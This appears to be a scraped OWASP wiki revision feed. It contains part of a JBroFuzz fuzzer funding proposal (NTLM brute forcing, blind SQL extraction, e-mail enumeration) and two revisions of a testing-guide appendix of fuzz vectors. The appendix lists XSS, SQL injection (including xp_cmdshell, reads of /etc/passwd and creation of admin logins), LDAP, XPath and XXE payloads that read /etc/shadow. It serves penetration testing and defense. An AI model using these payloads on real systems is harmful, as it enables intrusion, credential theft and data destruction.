Tab'''<br /> * '''NTLM Brute Force over HTTP/S Tab'''<br /> * '''Pure HTTP/S Fuzzing using HTTPClient'''<br /> * '''Blind SQL Injection Fuzzing Tab'''<br /> <br /> At the same time, the following existing tabs need to be updated and made more robust (details in next section):<br /> <br /> * '''TCP Fuzzing tab allowing graph outputs'''<br /> * '''TCP Sniffing tab update thread Agent Queue'''<br /> * '''Update Generators file format'''<br /> * '''Include SOAP and XML fuzzing'''<br /> <br /> This expansion process relates to stabilising code that is presently included in JBroFuzz, thus allowing it to run for extensive periods of time (24h+) as well as adding more functionality in terms of the three new tabs.<br /> <br /> ==== Deliverables ==== <br /> <br /> Based on the above, the new code elements that will be added are as follows:<br /> <br /> * '''Open Source Tab:''' ''Provide the ability to enumerate e-mails from newsgroups without breaching google automated search rules''<br /> * '''NTLM Brute Force over HTTP/S Tab:''' ''Provide the ability to enumerate NTLM as well as brute over HTTP/S NTLM.''<br /> * '''Pure HTTP/S Fuzzing:''' ''Implement a fuzzing tab utilising HTTPClient from Jakarta that will also allow for multi-threading''<br /> * '''Blind SQL Fuzzing Tab''' ''Implement a tab that extracts information from a blind SQL injection point identified on web server over HTTP/HTTPS.''<br /> <br /> For updating existing code elements that require a partial rewrite, the following areas of focus are presented in detail: <br /> <br /> * '''TCP Fuzzing tab allowing graph outputs:''' ''Provide the ability to graph fuzzing results during a particular session run. This will give the ability to integrate and pickup potential fuzzing patterns.''<br /> * '''TCP Sniffing tab update thread Agent Queue:''' ''Update the code of the sniffing panel in order to handle threaded agents in a more memory efficient way.''<br /> * '''Update Generators file format:''' ''Update the generators file format to allow for the parsing and creation of recursive generators.''<br /> * '''Include SOAP and XML fuzzing:''' ''Include an up to date list of SOAP and XML fuzzing templates.''<br /> <br /> Overall, the above two lists of changes should provide sufficient complexity and output for the spring of code 2007, forming a challenging implementation project.<br /> <br /> ==== Background ==== <br /> <br /> In its short life, the OWASP JBroFuzz Project has attracted the interest of the online security community with a total of appr. 5000 downloads in the last months. <br /> <br /> Coming from a strong java background (5+ years) I decided to implement and release JBroFuzz in order to initially simplify penetrations testing processes that relate to web application and network protocol fuzzing.<br /> <br /> I see the spring of code 2007 as a unique opportunity to industrialise network protocol fuzzing (and in particular HTTP/S fuzzing) within a single application, residing within OWASP.<br /> <br /> ==== Why should JBroFuzz should be sponsored? ==== <br /> <br /> Centralising fuzzing resources into one application that has the ability to handle network protocol fuzzing over HTTP and HTTPS in a simple and intuitive manner forms an area focus that should not be dismissed in building secure software applications.<br /> <br /> Receving an OWASP grant from the spring of code 2007 will trigger a share in the budget with all active participants depending on their level of involvement. This will be a direct function of the number of tabs and/or user functionality they have assisted in implementing. <br /> <br /> <br /> <br /> __NOTOC__</div> Subere https://wiki.owasp.org/index.php?title=File:Jbrf-05-sml.png&diff=16627 File:Jbrf-05-sml.png 2007-02-21T22:45:22Z <p>Subere: </p> <hr /> <div></div> Subere https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=14339 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-12-14T00:02:23Z <p>Subere: /* Format String Errors (FSE) */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replacive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replacive fuzzing ====<br /> <br /> Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> For details on XSS: [[Cross_site_scripting_AoC]]<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;<br /> alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;<br /> &amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058<br /> &amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt; <br /> &lt;nowiki&gt;&lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28<br /> &amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;<br /> <br /> === Buffer Overflows and Format String Errors ===<br /> <br /> ==== Buffer Overflows (BFO) ====<br /> A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.<br /> <br /> For details on Buffer Overflows: [[Buffer_Overflow_Testing_AoC]]<br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;<br /> <br /> ==== Format String Errors (FSE) ====<br /> <br /> Format string attacks are a class of vulnerabilities which involve supplying language specific format tokens in order to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.<br /> <br /> An excellent introduction on FSE can be found in the USENIX paper entitled: [http://www.usenix.net/publications/library/proceedings/sec01/full_papers/shankar/shankar_html/index.html Detecting Format String Vulnerabilities with Type Qualifiers]<br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;%s%p%x%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;.1024d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%.2049d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;<br /> <br /> ==== Integer Overflows (INT) ====<br /> <br /> Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If an attacker can cause the program to perform such a memory allocation, the program can be potentially vulnerabie to a buffer overflow attack.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;<br /> <br /> === SQL Injection ===<br /> <br /> This attack can affect the database layer of an application and is typically present when user input is not filtered for SQL statements.<br /> <br /> For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]<br /> <br /> SQL Injection is classified in the following two categories, depending on the exposure of database information (passive) or the alteration of database information (active).<br /> <br /> * Passive SQL Injection<br /> * Active SQL Injection<br /> <br /> Active SQL Injection statements can have a detrimental effect on the underllying database if successfully executed.<br /> <br /> ==== Passive SQL Injection (SQP) ====<br /> <br /> &lt;nowiki&gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;||6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'||'6&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(||6)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt; <br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select &lt;/nowiki&gt;<br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; <br /> @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;<br /> <br /> ==== Active SQL Injection (SQI) ====<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) <br /> + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;!&lt;/nowiki&gt;<br /> &lt;nowiki&gt;(&lt;/nowiki&gt;<br /> &lt;nowiki&gt;)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%28&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%26&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%21&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*|&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%7C&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(mail=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28mail%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*(|(objectclass=*))&lt;/nowiki&gt;<br /> &lt;nowiki&gt;%2A%28%7C%28objectclass%3D%2A%29%29&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'+or+''='&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+1=1+or+'x'='y&lt;/nowiki&gt;<br /> &lt;nowiki&gt;/&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//&lt;/nowiki&gt;<br /> &lt;nowiki&gt;//*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;*/*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;@*&lt;/nowiki&gt;<br /> &lt;nowiki&gt;count(/child::node())&lt;/nowiki&gt;<br /> &lt;nowiki&gt;x'+or+name()='username'+or+'x'='y&lt;/nowiki&gt;<br /> <br /> === XML Injection ===<br /> <br /> Details on XML Injection here: [[XML_Injection_Testing_AoC]]<br /> <br /> &lt;nowiki&gt;&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('gotcha');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foof&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file://c:/boot.ini&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/shadow&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM &quot;file:///dev/random&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;&lt;/nowiki&gt;<br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Subere https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=14338 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-12-13T23:56:23Z <p>Subere: /* SQL Injection */</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replacive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replacive fuzzing ====<br /> <br /> Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> For details on XSS: [[Cross_site_scripting_AoC]]<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;<br /> alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;<br /> 